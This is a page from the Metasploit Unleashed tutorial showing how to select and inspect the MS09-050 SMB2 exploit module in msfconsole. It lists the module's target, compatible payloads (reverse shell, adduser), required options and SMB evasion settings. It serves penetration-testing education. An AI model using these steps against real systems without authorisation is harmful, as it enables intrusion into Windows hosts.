Using Exploits

From Metasploit Unleashed
Jump to: navigation, search



Selecting an exploit in Metasploit adds the 'exploit' and 'check' commands to msfconsole.

msf > use  exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > help
...snip...
Exploit Commands
================

    Command       Description
    -------       -----------
    check         Check to see if a target is vulnerable
    exploit       Launch an exploit attempt
    rcheck        Reloads the module and checks if the target is vulnerable
    rexploit      Reloads the module and launches an exploit attempt

msf exploit(ms09_050_smb2_negotiate_func_index) >


Show

Using an exploit also adds more options to the 'show' command.

Targets

msf exploit(ms09_050_smb2_negotiate_func_index) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Vista SP1/SP2 and Server 2008 (x86)



Payloads

msf exploit(ms09_050_smb2_negotiate_func_index) > show payloads

Compatible Payloads
===================

   Name                              Disclosure Date  Rank    Description
   ----                              ---------------  ----    -----------
   generic/custom                                     normal  Custom Payload
   generic/debug_trap                                 normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                             normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                          normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                 normal  Generic x86 Tight Loop
   windows/adduser                                    normal  Windows Execute net user /ADD
...snip...


Options

msf exploit(ms09_050_smb2_negotiate_func_index) > show options

Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  445              yes       The target port
   WAIT   180              yes       The number of seconds to wait for the attack to complete.


Exploit target:

   Id  Name
   --  ----
   0   Windows Vista SP1/SP2 and Server 2008 (x86)



Advanced

msf exploit(ms09_050_smb2_negotiate_func_index) > show advanced

Module advanced options:

   Name           : CHOST
   Current Setting:
   Description    : The local client address

   Name           : CPORT
   Current Setting:
   Description    : The local client port
...snip...


Evasion

msf exploit(ms09_050_smb2_negotiate_func_index) > show evasion
Module evasion options:

   Name           : SMB::obscure_trans_pipe_level
   Current Setting: 0
   Description    : Obscure PIPE string in TransNamedPipe (level 0-3)

   Name           : SMB::pad_data_level
   Current Setting: 0
   Description    : Place extra padding between headers and data (level 0-3)

   Name           : SMB::pad_file_level
   Current Setting: 0
   Description    : Obscure path names used in open/create (level 0-3)
...snip...




Using Exploits